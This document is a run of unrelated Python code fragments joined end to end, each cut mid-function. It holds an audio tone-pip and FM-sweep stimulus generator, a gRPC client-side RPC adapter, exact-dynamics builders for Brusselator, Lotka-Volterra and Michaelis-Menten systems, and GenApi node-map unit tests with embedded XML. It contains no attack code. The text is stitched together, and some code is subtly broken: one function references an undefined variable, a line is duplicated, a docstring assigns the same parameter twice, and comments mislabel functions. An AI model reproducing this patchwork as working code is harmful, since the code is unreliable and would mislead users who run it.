pip_atten = [0, 10, 20, 30]
pip_density = 6
p_left = 0.8
Example 2:
fs = 48e3
dur = 3
f1 = 200.
f2 = 3200
pip_dur = 0.05
pip_atten = [0, 10, 20, 30]
pip_density = 2
p_left = 0.2
References:
<NAME>., <NAME>., & <NAME>. (1998). Optimizing sound features for cortical neurons. Science, 280(5368), 1439-1444.
<NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2003). Spectrotemporal structure of receptive fields in areas AI and AAF of mouse auditory cortex. Journal of neurophysiology, 90(4), 2660-2675.
'''
# Hard code a couple args
pip_ramp_time = 0.005
n_bins_oct = 12 # frequency bins per oct
n_bins_time = int( np.floor( dur / pip_dur ) )
n_oct = np.log2( f2/f1 )
n_bins_freq = int( np.floor( n_oct * n_bins_oct ) )
# Store stim values in matrix format
stim_matrix_0 = np.zeros( ( n_bins_freq, n_bins_time ), dtype=np.float64 )
stim_matrix_0[:,:] = -np.inf
stim_matrix = np.zeros( ( n_bins_freq, n_bins_time, 2 ), dtype=np.float64 )
stim_matrix[:,:,:] = -np.inf
axis_time = np.arange( 0, dur, pip_dur )
axis_freq = f1 * 2 ** ( np.linspace( 0, np.log2( f2/f1 ), n_bins_freq ) )
y = np.zeros( ( int(fs*dur), 2 ), dtype=np.float64 )
n_pips = int( np.floor( n_oct * pip_density ) )
n_pip_samples = int( pip_dur * fs )
# 1/3: populate frequencies for each time bin - - - - - - - - - - - - - - - -
for ii in range(n_bins_time):
freqs = np.random.choice( n_bins_freq, n_pips, replace=False ) # select frequencies to generate for time step
for jj in range(freqs.size):
# Define tone frequency and attenuation
freq = axis_freq[ freqs[jj] ]
if isinstance(pip_atten, int):
atten = pip_atten
elif len( pip_atten ) == 1:
atten = pip_atten
else:
atten = pip_atten[ np.random.choice( len(pip_atten), 1 )[0] ]
stim_matrix_0[ freqs[jj], ii ] = atten
# 2/3: randomly assign frequencies to each channel in proportion to p_left arg - - - - - - - - - - - - - - - -
idx_tone = np.nonzero( stim_matrix_0 > -np.inf )
n_tones = idx_tone[0].size
idx_l = np.random.choice( n_tones, int( np.ceil( n_tones * p_left ) ), replace=False )
idx_r = np.setdiff1d( np.arange( 0, n_tones ), idx_l )
stim_matrix[ idx_tone[0][idx_l], idx_tone[1][idx_l], 0 ] = stim_matrix_0[ idx_tone[0][idx_l], idx_tone[1][idx_l] ]
stim_matrix[ idx_tone[0][idx_r], idx_tone[1][idx_r], 1 ] = stim_matrix_0[ idx_tone[0][idx_r], idx_tone[1][idx_r] ]
# 3/3: generate chords for each channel specified above - - - - - - - - - - - - - - - -
for ii in range(n_bins_time):
# Left ------
y0 = np.zeros( int(fs*pip_dur ), dtype=np.float64 )
idx_tone0 = np.nonzero( stim_matrix[ :, ii, 0 ] > -np.inf )[0]
if idx_tone0.size > 0:
for jj in range(idx_tone0.size):
# Define tone frequency and attenuation
freq = axis_freq[ idx_tone0[jj] ]
atten = stim_matrix[ idx_tone0[jj], ii, 0 ]
# Generate tone and add to chord
y1 = gen_tone( fs, pip_dur, freq, atten )
y1 = audio_ramp( y1, fs, pip_ramp_time )
y0 += y1
y0 = y0 / idx_tone0.size
y[ n_pip_samples * ii: n_pip_samples * (ii+1), 0 ] = y0
# Right ------
y0 = np.zeros( int(fs*pip_dur ), dtype=np.float64 )
idx_tone0 = np.nonzero( stim_matrix[ :, ii, 1 ] > -np.inf )[0]
if idx_tone0.size > 0:
for jj in range(idx_tone0.size):
# Define tone frequency and attenuation
freq = axis_freq[ idx_tone0[jj] ]
atten = stim_matrix[ idx_tone0[jj], ii, 1 ]
# Generate tone and add to chord
y1 = gen_tone( fs, pip_dur, freq, atten )
y1 = audio_ramp( y1, fs, pip_ramp_time )
y0 += y1
y0 = y0 / idx_tone0.size
y[ n_pip_samples * ii: n_pip_samples * (ii+1), 1 ] = y0
if opt_plot:
fig, ax = plt.subplots(1,2)
fig.set_size_inches( 15, 5 )
im = ax[0].imshow( stim_matrix[:,:,0], cmap='RdBu', origin='lower', aspect='auto', extent=[ min(axis_time),max(axis_time), min(axis_freq),max(axis_freq) ] )
ax[0].set_xlabel('Time(s)')
ax[0].set_ylabel('Frequency (Hz)')
ax[0].set_title('Left')
im = ax[1].imshow( stim_matrix[:,:,1], cmap='RdBu', origin='lower', aspect='auto', extent=[ min(axis_time),max(axis_time), min(axis_freq),max(axis_freq) ] )
ax[1].set_xlabel('Time(s)')
ax[1].set_ylabel('Frequency (Hz)')
ax[1].set_title('Right')
fig.colorbar(im, ax=ax)
return y, stim_matrix, axis_time, axis_freq
def gen_fm_sweep( fs, dur, f1, f2, sweep_direction=1 ):
'''
Generate frequency-modulated sweep (audio waveform)
INPUT -------
fs : audio sample rate, e.g., 48e3
dur : duration (s)
f1 : low frequency (Hz)
f2 : high frequency (Hz), should not exceed fs/2
sweep_direction: ascending (1) or descending (0)
RETURN -------
y : audio signal (sound pressure waveform)
Example:
fs = 48e3
dur = 0.5
f1 = 200.
f1 = 2e4
sweep_direction = 1
'''
tvec = np.arange( 0, dur, 1/fs ) # time vector
# log sweep
beta = ( np.log( f2/f1 ) ) / dur
# set zero crossing of sweep at t=0 | |
<filename>src/python/grpcio/grpc/_adapter/rear.py
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""The RPC-invocation-side bridge between RPC Framework and GRPC-on-the-wire."""
import enum
import logging
import threading
import time
from grpc._adapter import _common
from grpc._adapter import _intermediary_low as _low
from grpc.framework.base import interfaces as base_interfaces
from grpc.framework.base import null
from grpc.framework.foundation import activated
from grpc.framework.foundation import logging_pool
_THREAD_POOL_SIZE = 10
_INVOCATION_EVENT_KINDS = (
_low.Event.Kind.METADATA_ACCEPTED,
_low.Event.Kind.FINISH
)
@enum.unique
class _LowWrite(enum.Enum):
"""The possible categories of low-level write state."""
OPEN = 'OPEN'
ACTIVE = 'ACTIVE'
CLOSED = 'CLOSED'
class _RPCState(object):
"""The full state of any tracked RPC.
Attributes:
call: The _low.Call object for the RPC.
outstanding: The set of Event.Kind values describing expected future events
for the RPC.
active: A boolean indicating whether or not the RPC is active.
common: An _common.RPCState describing additional state for the RPC.
"""
def __init__(self, call, outstanding, active, common):
self.call = call
self.outstanding = outstanding
self.active = active
self.common = common
def _write(operation_id, call, outstanding, write_state, serialized_payload):
if write_state.low is _LowWrite.OPEN:
call.write(serialized_payload, operation_id, 0)
outstanding.add(_low.Event.Kind.WRITE_ACCEPTED)
write_state.low = _LowWrite.ACTIVE
elif write_state.low is _LowWrite.ACTIVE:
write_state.pending.append(serialized_payload)
else:
raise ValueError('Write attempted after writes completed!')
class RearLink(base_interfaces.RearLink, activated.Activated):
"""An invocation-side bridge between RPC Framework and the C-ish _low code."""
def __init__(
self, host, port, pool, request_serializers, response_deserializers,
secure, root_certificates, private_key, certificate_chain,
metadata_transformer=None, server_host_override=None):
"""Constructor.
Args:
host: The host to which to connect for RPC service.
port: The port to which to connect for RPC service.
pool: A thread pool.
request_serializers: A dict from RPC method names to request object
serializer behaviors.
response_deserializers: A dict from RPC method names to response object
deserializer behaviors.
secure: A boolean indicating whether or not to use a secure connection.
root_certificates: The PEM-encoded root certificates or None to ask for
them to be retrieved from a default location.
private_key: The PEM-encoded private key to use or None if no private
key should be used.
certificate_chain: The PEM-encoded certificate chain to use or None if
no certificate chain should be used.
metadata_transformer: A function that given a metadata object produces
another metadata to be used in the underlying communication on the
wire.
server_host_override: (For testing only) the target name used for SSL
host name checking.
"""
self._condition = threading.Condition()
self._host = host
self._port = port
self._pool = pool
self._request_serializers = request_serializers
self._response_deserializers = response_deserializers
self._fore_link = null.NULL_FORE_LINK
self._completion_queue = None
self._channel = None
self._rpc_states = {}
self._spinning = False
if secure:
self._client_credentials = _low.ClientCredentials(
root_certificates, private_key, certificate_chain)
else:
self._client_credentials = None
self._root_certificates = root_certificates
self._private_key = private_key
self._certificate_chain = certificate_chain
self._metadata_transformer = metadata_transformer
self._server_host_override = server_host_override
def _on_write_event(self, operation_id, event, rpc_state):
if event.write_accepted:
if rpc_state.common.write.pending:
rpc_state.call.write(
rpc_state.common.write.pending.pop(0), operation_id, 0)
rpc_state.outstanding.add(_low.Event.Kind.WRITE_ACCEPTED)
elif rpc_state.common.write.high is _common.HighWrite.CLOSED:
rpc_state.call.complete(operation_id)
rpc_state.outstanding.add(_low.Event.Kind.COMPLETE_ACCEPTED)
rpc_state.common.write.low = _LowWrite.CLOSED
else:
rpc_state.common.write.low = _LowWrite.OPEN
else:
logging.error('RPC write not accepted! Event: %s', (event,))
rpc_state.active = False
ticket = base_interfaces.BackToFrontTicket(
operation_id, rpc_state.common.sequence_number,
base_interfaces.BackToFrontTicket.Kind.TRANSMISSION_FAILURE, None)
rpc_state.common.sequence_number += 1
self._fore_link.accept_back_to_front_ticket(ticket)
def _on_read_event(self, operation_id, event, rpc_state):
if event.bytes is not None:
rpc_state.call.read(operation_id)
rpc_state.outstanding.add(_low.Event.Kind.READ_ACCEPTED)
ticket = base_interfaces.BackToFrontTicket(
operation_id, rpc_state.common.sequence_number,
base_interfaces.BackToFrontTicket.Kind.CONTINUATION,
rpc_state.common.deserializer(event.bytes))
rpc_state.common.sequence_number += 1
self._fore_link.accept_back_to_front_ticket(ticket)
def _on_complete_event(self, operation_id, event, rpc_state):
if not event.complete_accepted:
logging.error('RPC complete not accepted! Event: %s', (event,))
rpc_state.active = False
ticket = base_interfaces.BackToFrontTicket(
operation_id, rpc_state.common.sequence_number,
base_interfaces.BackToFrontTicket.Kind.TRANSMISSION_FAILURE, None)
rpc_state.common.sequence_number += 1
self._fore_link.accept_back_to_front_ticket(ticket)
# TODO(nathaniel): Metadata support.
def _on_metadata_event(self, operation_id, event, rpc_state): # pylint: disable=unused-argument
rpc_state.call.read(operation_id)
rpc_state.outstanding.add(_low.Event.Kind.READ_ACCEPTED)
def _on_finish_event(self, operation_id, event, rpc_state):
"""Handle termination of an RPC."""
# TODO(nathaniel): Cover all statuses.
if event.status.code is _low.Code.OK:
kind = base_interfaces.BackToFrontTicket.Kind.COMPLETION
elif event.status.code is _low.Code.CANCELLED:
kind = base_interfaces.BackToFrontTicket.Kind.CANCELLATION
elif event.status.code is _low.Code.DEADLINE_EXCEEDED:
kind = base_interfaces.BackToFrontTicket.Kind.EXPIRATION
else:
kind = base_interfaces.BackToFrontTicket.Kind.TRANSMISSION_FAILURE
ticket = base_interfaces.BackToFrontTicket(
operation_id, rpc_state.common.sequence_number, kind, None)
rpc_state.common.sequence_number += 1
self._fore_link.accept_back_to_front_ticket(ticket)
def _spin(self, completion_queue):
while True:
event = completion_queue.get(None)
operation_id = event.tag
with self._condition:
rpc_state = self._rpc_states[operation_id]
rpc_state.outstanding.remove(event.kind)
if rpc_state.active and self._completion_queue is not None:
if event.kind is _low.Event.Kind.WRITE_ACCEPTED:
self._on_write_event(operation_id, event, rpc_state)
elif event.kind is _low.Event.Kind.METADATA_ACCEPTED:
self._on_metadata_event(operation_id, event, rpc_state)
elif event.kind is _low.Event.Kind.READ_ACCEPTED:
self._on_read_event(operation_id, event, rpc_state)
elif event.kind is _low.Event.Kind.COMPLETE_ACCEPTED:
self._on_complete_event(operation_id, event, rpc_state)
elif event.kind is _low.Event.Kind.FINISH:
self._on_finish_event(operation_id, event, rpc_state)
else:
logging.error('Illegal RPC event! %s', (event,))
if not rpc_state.outstanding:
self._rpc_states.pop(operation_id)
if not self._rpc_states:
self._spinning = False
self._condition.notify_all()
return
def _invoke(self, operation_id, name, high_state, payload, timeout):
"""Invoke an RPC.
Args:
operation_id: Any object to be used as an operation ID for the RPC.
name: The RPC method name.
high_state: A _common.HighWrite value representing the "high write state"
of the RPC.
payload: A payload object for the RPC or None if no payload was given at
invocation-time.
timeout: A duration of time in seconds to allow for the RPC.
"""
request_serializer = self._request_serializers[name]
call = _low.Call(self._channel, self._completion_queue, name, self._host, time.time() + timeout)
if self._metadata_transformer is not None:
metadata = self._metadata_transformer([])
for metadata_key, metadata_value in metadata:
call.add_metadata(metadata_key, metadata_value)
call.invoke(self._completion_queue, operation_id, operation_id)
outstanding = set(_INVOCATION_EVENT_KINDS)
if payload is None:
if high_state is _common.HighWrite.CLOSED:
call.complete(operation_id)
low_state = _LowWrite.CLOSED
outstanding.add(_low.Event.Kind.COMPLETE_ACCEPTED)
else:
low_state = _LowWrite.OPEN
else:
serialized_payload = request_serializer(payload)
call.write(serialized_payload, operation_id, 0)
outstanding.add(_low.Event.Kind.WRITE_ACCEPTED)
low_state = _LowWrite.ACTIVE
write_state = _common.WriteState(low_state, high_state, [])
common_state = _common.CommonRPCState(
write_state, 0, self._response_deserializers[name], request_serializer)
self._rpc_states[operation_id] = _RPCState(
call, outstanding, True, common_state)
if not self._spinning:
self._pool.submit(self._spin, self._completion_queue)
self._spinning = True
def _commence(self, operation_id, name, payload, timeout):
self._invoke(operation_id, name, _common.HighWrite.OPEN, payload, timeout)
def _continue(self, operation_id, payload):
rpc_state = self._rpc_states.get(operation_id, None)
if rpc_state is None or not rpc_state.active:
return
_write(
operation_id, rpc_state.call, rpc_state.outstanding,
rpc_state.common.write, rpc_state.common.serializer(payload))
def _complete(self, operation_id, payload):
"""Close writes associated with an ongoing RPC.
Args:
operation_id: Any object being use as an operation ID for the RPC.
payload: A payload object for the RPC (and thus the last payload object
for the RPC) or None if no payload was given along with the instruction
to indicate the end of writes for the RPC.
"""
rpc_state = self._rpc_states.get(operation_id, None)
if rpc_state is None or not rpc_state.active:
return
write_state = rpc_state.common.write
if payload is None:
if write_state.low is _LowWrite.OPEN:
rpc_state.call.complete(operation_id)
rpc_state.outstanding.add(_low.Event.Kind.COMPLETE_ACCEPTED)
write_state.low = _LowWrite.CLOSED
else:
_write(
operation_id, rpc_state.call, rpc_state.outstanding, write_state,
rpc_state.common.serializer(payload))
write_state.high = _common.HighWrite.CLOSED
def _entire(self, operation_id, name, payload, timeout):
self._invoke(operation_id, name, _common.HighWrite.CLOSED, payload, timeout)
def _cancel(self, operation_id):
rpc_state = self._rpc_states.get(operation_id, None)
if rpc_state is not None and rpc_state.active:
rpc_state.call.cancel()
rpc_state.active = False
def join_fore_link(self, fore_link):
"""See base_interfaces.RearLink.join_fore_link for specification."""
with self._condition:
self._fore_link = null.NULL_FORE_LINK if fore_link is None else fore_link
def _start(self):
"""Starts this RearLink.
This method must be called before attempting to exchange tickets with this
object.
"""
with self._condition:
self._completion_queue = _low.CompletionQueue()
self._channel = _low.Channel(
'%s:%d' % (self._host, self._port), self._client_credentials,
server_host_override=self._server_host_override)
return self
def _stop(self):
"""Stops this RearLink.
This method must be called for proper termination of this object, and no
attempts to exchange tickets with this object may be made after this method
has been called.
"""
with self._condition:
self._completion_queue.stop()
self._completion_queue = None
while self._spinning:
self._condition.wait()
def __enter__(self):
"""See activated.Activated.__enter__ for specification."""
return self._start()
def __exit__(self, exc_type, exc_val, | |
+ "^3")] = (
1 * beta
)
exact_solution[
i, reference_polynomial.index("x" + str(i) + "^2 x" + str(i + 1))
] = (3 * beta)
exact_solution[
i, reference_polynomial.index("x" + str(i) + " x" + str(i + 1) + "^2")
] = (-3 * beta)
exact_solution[
i, reference_polynomial.index("x" + str(i - 1) + " x" + str(i) + "^2")
] = (3 * beta)
exact_solution[
i, reference_polynomial.index("x" + str(i - 1) + "^2 x" + str(i))
] = (-3 * beta)
# Equation for the end point.
exact_solution[
number_of_oscillators - 1,
reference_polynomial.index("x" + str(number_of_oscillators - 1)),
] = -2
exact_solution[
number_of_oscillators - 1,
reference_polynomial.index("x" + str(number_of_oscillators - 2)),
] = 1
# Third order terms
exact_solution[
number_of_oscillators - 1,
reference_polynomial.index("x" + str(number_of_oscillators - 1) + "^3"),
] = (-2 * beta)
exact_solution[
number_of_oscillators - 1,
reference_polynomial.index("x" + str(number_of_oscillators - 2) + "^3"),
] = beta
exact_solution[
number_of_oscillators - 1,
reference_polynomial.index(
"x"
+ str(number_of_oscillators - 2)
+ "^2 x"
+ str(number_of_oscillators - 1)
),
] = (-3 * beta)
exact_solution[
number_of_oscillators - 1,
reference_polynomial.index(
"x"
+ str(number_of_oscillators - 2)
+ " x"
+ str(number_of_oscillators - 1)
+ "^2"
),
] = (3 * beta)
return exact_solution
def brusselator_time(initial_position, t_min = 0.0, t_max = 10.0, num_steps = 1000, r_coefficients = [1, 3, 1, 1]):
#% rate constants:
#r1 = 1; % 0 -> A
#r2 = 3; % A -> B
#r3 = 1; % 2A + B -> 3A
#r4 = 1; % A -> 0
r1, r2, r3, r4 = r_coefficients
def fun_exact(t, y):
return np.array([r1-r2*y[0]+r3*y[0]**2*y[1]-r4*y[0], r2*y[0]-r3*y[0]**2*y[1]])
from scipy.integrate import solve_ivp
sol_true = solve_ivp(
fun_exact,
[0, t_max],
initial_position,
t_eval=np.linspace(t_min, t_max, num_steps),
vectorized=False,
)
assert (
sol_true["status"] == 0
), "The integration of the initial value solver was not succesfull."
return sol_true, fun_exact(sol_true['t'], sol_true['y'])
# Build the exact dynamics of the fermi_pasta_ulam if we have polynomials of order up to three.
def exact_solution_brusselator(dimension, polinomial, r_coefficients):
r1, r2, r3, r4 = r_coefficients
reference_polynomial = polinomial.get_feature_names()
num_basis_functions = len(reference_polynomial)
# Build the exact solution at the boundary
exact_solution = np.zeros((dimension, num_basis_functions))
# Solution for the first species
exact_solution[0, reference_polynomial.index("1")] = r1
exact_solution[0, reference_polynomial.index("x0")] = - r2 - r4
exact_solution[0, reference_polynomial.index("x0")] = - r2 - r4
exact_solution[0, reference_polynomial.index("x0^2 x1")] = r3
# Solution for the first species
exact_solution[1, reference_polynomial.index("x0")] = r2
exact_solution[1, reference_polynomial.index("x0^2 x1")] = -r3
return exact_solution
def lutka_volterra_time(initial_position, t_min = 0.0, t_max = 10.0, num_steps = 1000, r_coefficients = [1, 1, 1, 1]):
#% rate constants:
#r1 = 1; % reproduction of prey: A -> 2A
#r2 = 1; % death of predator: B -> 0
#r3 = 1; % consumption: A + B -> B
#r4 = 1; % reproduction of predator: A + B -> A + 2B
r1, r2, r3, r4 = r_coefficients
def fun_exact(t, y):
return np.array([y[0]*(r1-r3*y[1]), -y[1]*(r2-r4*y[0])])
from scipy.integrate import solve_ivp
sol_true = solve_ivp(
fun_exact,
[0, t_max],
initial_position,
t_eval=np.linspace(t_min, t_max, num_steps),
vectorized=False,
)
assert (
sol_true["status"] == 0
), "The integration of the initial value solver was not succesfull."
return sol_true, fun_exact(sol_true['t'], sol_true['y'])
# Build the exact dynamics of the fermi_pasta_ulam if we have polynomials of order up to three.
def exact_solution_lutka_volterra(dimension, polinomial, r_coefficients):
r1, r2, r3, r4 = r_coefficients
reference_polynomial = polinomial.get_feature_names()
num_basis_functions = len(reference_polynomial)
# Build the exact solution at the boundary
exact_solution = np.zeros((dimension, num_basis_functions))
# Solution for the first species
exact_solution[0, reference_polynomial.index("x0")] = r1
exact_solution[0, reference_polynomial.index("x0 x1")] = - r3
# Solution for the first species
exact_solution[1, reference_polynomial.index("x1")] = - r2
exact_solution[1, reference_polynomial.index("x0 x1")] = r4
return exact_solution
def michaelis_menten_time(dimension, number_of_snapshots, number_of_experiments = 10, t_min = 0.0, t_max = 10.0, coefficients = [0.01, 1, 1]):
#Expressions
#d/dt C_1 = - k_{1}*C_{1}*C_{2} + k_{-1}* C_{3}
#d/dt C_2 = - k_{1}*C_{1}*C_{2} + (k_{-1} + k_{2})* C_{3}
#d/dt C_3 = k_{1}*C_{1}*C_{2} - (k_{-1} + k_{2})* C_{3}
#d/dt C_4 = k_{2}*C_{3}
# initial_position = np.array([1.0, 0.7, 0.0, 0.0])
k_1, k_2, k_minus1 = coefficients
def fun_exact(t, y):
return np.array([-k_1*y[0]*y[1] + k_minus1*y[2], -k_1*y[0]*y[1] + (k_minus1 + k_2)*y[2], k_1*y[0]*y[1] - (k_minus1 + k_2)*y[2], k_2*y[2]])
from scipy.integrate import solve_ivp
list_snapshots = []
list_derivatives = []
list_times = []
for i in range(number_of_experiments):
initial_position = np.random.rand(4)
sol = solve_ivp(
fun_exact,
[0, t_max],
initial_position,
t_eval=np.linspace(t_min, t_max, number_of_snapshots),
vectorized=False,
)
assert (
sol["status"] == 0
), "The integration of the initial value solver was not succesfull."
snapshots = sol.y
derivatives = np.zeros([dimension, number_of_snapshots])
for i in range(number_of_snapshots):
derivatives[:, i] = fun_exact(0, snapshots[:, i])
list_derivatives.append(derivatives)
list_times.append(sol['t'])
list_snapshots.append(snapshots)
return list_snapshots, list_derivatives, list_times
def michaelis_menten_time_individual(initial_position, t_min = 0.0, t_max = 10.0, num_steps = 1000, coefficients = [0.01, 1, 1]):
#Expressions
#d/dt C_1 = - k_{1}*C_{1}*C_{2} + k_{-1}* C_{3}
#d/dt C_2 = - k_{1}*C_{1}*C_{2} + (k_{-1} + k_{2})* C_{3}
#d/dt C_3 = k_{1}*C_{1}*C_{2} - (k_{-1} + k_{2})* C_{3}
#d/dt C_4 = k_{2}*C_{3}
k_1, k_2, k_minus1 = coefficients
def fun_exact(t, y):
return np.array([-k_1*y[0]*y[1] + k_minus1*y[2], -k_1*y[0]*y[1] + (k_minus1 + k_2)*y[2], k_1*y[0]*y[1] - (k_minus1 + k_2)*y[2], k_2*y[2]])
from scipy.integrate import solve_ivp
sol_true = solve_ivp(
fun_exact,
[0, t_max],
initial_position,
t_eval=np.linspace(t_min, t_max, num_steps),
vectorized=False,
)
assert (
sol_true["status"] == 0
), "The integration of the initial value solver was not succesfull."
return sol_true, fun_exact(sol_true['t'], sol_true['y'])
# Build the exact dynamics of the fermi_pasta_ulam if we have polynomials of order up to three.
def exact_solution_michaelis_menten(dimension, polinomial, coefficients):
assert dimension == 4, "The dimension of the michaelis-menten dynamic should be 4."
k_1, k_2, k_minus1 = coefficients
reference_polynomial = polinomial.get_feature_names()
num_basis_functions = len(reference_polynomial)
exact_solution = np.zeros((dimension, num_basis_functions))
#First species.
exact_solution[0, reference_polynomial.index("x0 x1")] = -k_1
exact_solution[0, reference_polynomial.index("x2")] = k_minus1
#Second species
exact_solution[1, reference_polynomial.index("x0 x1")] = -k_1
exact_solution[1, reference_polynomial.index("x2")] = k_minus1 + k_2
#Third species
exact_solution[2, reference_polynomial.index("x0 x1")] = k_1
exact_solution[2, reference_polynomial.index("x2")] = -(k_minus1 + k_2)
#Fourth species.
exact_solution[3, reference_polynomial.index("x2")] = k_2
return exact_solution
# Build the exact dynamics of the fermi_pasta_ulam if we have polynomials of order up to three.
def exact_solution_michaelis_menten_1D(polinomial, coefficients, initial_position):
k_1, k_2, k_minus1 = coefficients
reference_polynomial = polinomial.get_feature_names()
num_basis_functions = len(reference_polynomial)
exact_solution = np.zeros((dimension, num_basis_functions))
#First species.
exact_solution[0, reference_polynomial.index("x0 x1")] = -k_1
exact_solution[0, reference_polynomial.index("x2")] = k_minus1
#Second species
exact_solution[1, reference_polynomial.index("x0 x1")] = -k_1
exact_solution[1, reference_polynomial.index("x2")] = k_minus1 + k_2
#Third species
exact_solution[2, reference_polynomial.index("x0 x1")] = k_1
exact_solution[2, reference_polynomial.index("x2")] = -(k_minus1 + k_2)
#Fourth species.
exact_solution[3, reference_polynomial.index("x2")] = k_2
return exact_solution
#Add the constraints given by:
#d/dt (C_{2} + C_{3}) = 0
#d/dt (C_{1} + C_{3} + C_{4}) + 0
def add_constraints_michaelis_menten_easy(polinomial):
feature_names = polinomial.get_feature_names()
list_constraints = []
for i in range(len(feature_names)):
list_constraints.append({"x" + str(int(len(feature_names) + i)): 1.0, "x" + str(int(2.0*len(feature_names) + i)): 1.0, "constant": 0.0})
list_constraints.append({"x" + str(i): 1.0, "x" + str(int(2.0*len(feature_names) + i)): 1.0,"x" + str(int(3.0*len(feature_names) + i)): 1.0 , "constant": 0.0})
return list_constraints
def add_constraints_michaelis_menten_hard(polinomial, data, normalization_factors, epsilon):
feature_names = polinomial.get_feature_names()
num_data_points = data.shape[1]
list_constraints = []
#Four constraints per datapoint
for j in range(num_data_points):
constraint_dictionary = {}
constraint_dictionary2 = {}
constraint_dictionary3 = {}
constraint_dictionary4 = {}
for i in range(len(feature_names)):
#First symmetry. One side of abs val.
constraint_dictionary["x" + str(int(len(feature_names) + i))] = data[i, j]/normalization_factors[i][0]
constraint_dictionary["x" + str(int(2.0*len(feature_names) + i))] = data[i, j]/normalization_factors[i][0]
constraint_dictionary["constant"] = epsilon
#First symmetry. Other side of abs val.
constraint_dictionary2["x" + str(int(len(feature_names) + i))] = -data[i, j]/normalization_factors[i][0]
constraint_dictionary2["x" + str(int(2.0*len(feature_names) + i))] = -data[i, j]/normalization_factors[i][0]
constraint_dictionary2["constant"] = epsilon
#Second symmetry. One side of abs val.
constraint_dictionary3["x" + str(i)] = data[i, j]/normalization_factors[i][0]
constraint_dictionary3["x" + str(int(2.0*len(feature_names) + i))] = data[i, j]/normalization_factors[i][0]
constraint_dictionary3["x" + str(int(3.0*len(feature_names) + i))] = data[i, j]/normalization_factors[i][0]
constraint_dictionary3["constant"] = epsilon
#Second symmetry. Other side of abs val.
constraint_dictionary4["x" + str(i)] = -data[i, j]/normalization_factors[i][0]
constraint_dictionary4["x" + str(int(2.0*len(feature_names) + i))] = -data[i, j]/normalization_factors[i][0]
constraint_dictionary4["x" + str(int(3.0*len(feature_names) + i))] = -data[i, j]/normalization_factors[i][0]
constraint_dictionary4["constant"] = epsilon
list_constraints.append(constraint_dictionary)
list_constraints.append(constraint_dictionary2)
list_constraints.append(constraint_dictionary3)
list_constraints.append(constraint_dictionary4)
return list_constraints
def simulate_dynamics(basis, dynamic, initial_position, t_max, num_steps = 1000):
# Plot the exact trajectory.
def fun_dynamic(t, y):
return np.dot(
dynamic, basis.fit_transform(y.reshape(1, -1)).T
).squeeze()
from scipy.integrate import solve_ivp
t_val = np.linspace(0, t_max, num_steps)
sol_true = solve_ivp(fun_dynamic,[0, t_max], initial_position, t_eval= np.linspace(0.0, t_max, num_steps), vectorized=False)
return sol_true['y'], t_val
def simulate_dynamics_kuramoto(basis, dynamic, initial_position, t_max, num_steps = 1000):
# Plot the exact trajectory.
def fun_dynamic(t, y):
y_transformed = np.vstack(
(np.cos(y), np.sin(y))
)
return np.dot(
dynamic, basis.fit_transform(y_transformed.reshape(1, -1)).T
).squeeze()
from scipy.integrate import solve_ivp
t_val = np.linspace(0, t_max, num_steps)
| |
<Bit>0</Bit>
</StructEntry>
<StructEntry Name="Bit1" NameSpace="Custom">
<Bit>1</Bit>
</StructEntry>
<StructEntry Name="Bit2" NameSpace="Custom">
<Bit>2</Bit>
</StructEntry>
</StructReg>
<Port Name="MyPort"/>
"""
Camera = CNodeMapRef()
Camera._LoadXMLFromFile("GenApiTest", "NodeTestSuite_TestStructReg")
# create and initialize a test port
Port = CTestPort()
Port.CreateEntry(0x02, "uint32_t", 0xFFFFFFFF, RW, LittleEndian)
# connect the node map to the port
Camera._Connect(Port, "MyPort")
Bit0 = Camera.GetNode("Bit0")
self.assertTrue(bool(Bit0))
Bit1 = Camera.GetNode("Bit1")
self.assertTrue(bool(Bit1))
Bit2 = Camera.GetNode("Bit2")
self.assertTrue(bool(Bit2))
Bit0 = Bit0.GetValue()
Bit1 = Bit1.GetValue()
Bit2 = Bit2.GetValue()
self.assertEqual(1, Bit0)
self.assertEqual(1, Bit1)
self.assertEqual(1, Bit2)
def test_Extension(self):
"""[ GenApiTest@NodeTestSuite_TestExtension.xml|gxml
<Node Name="CatNode">
<Extension>
<MyFavourite>123</MyFavourite>
<AnotherNode>
<WithSubNode>bla</WithSubNode>
<WithSubNode>blub</WithSubNode>
</AnotherNode>
</Extension>
</Node>
"""
Camera = CNodeMapRef()
Camera._LoadXMLFromFile("GenApiTest", "NodeTestSuite_TestExtension")
def test_AccessModeCache(self):
Port = CTestPort()
RegisterA = 0
RegisterB = 0
Port.CreateEntry(0x4000, "uint32_t", RegisterA, RW, LittleEndian)
Port.CreateEntry(0x4004, "uint32_t", RegisterB, RW, LittleEndian)
"""[ GenApiTest@NodeTestSuite_TestAccessModeCache.xml|gxml
<IntReg Name="A">
<Address>0x4000</Address>
<Length>4</Length>
<AccessMode>RO</AccessMode>
<pPort>MyPort</pPort>
<Cachable>NoCache</Cachable>
<Sign>Unsigned</Sign>
<Endianess>BigEndian</Endianess>
</IntReg>
<IntReg Name="B">
<Address>0x4004</Address>
<Length>4</Length>
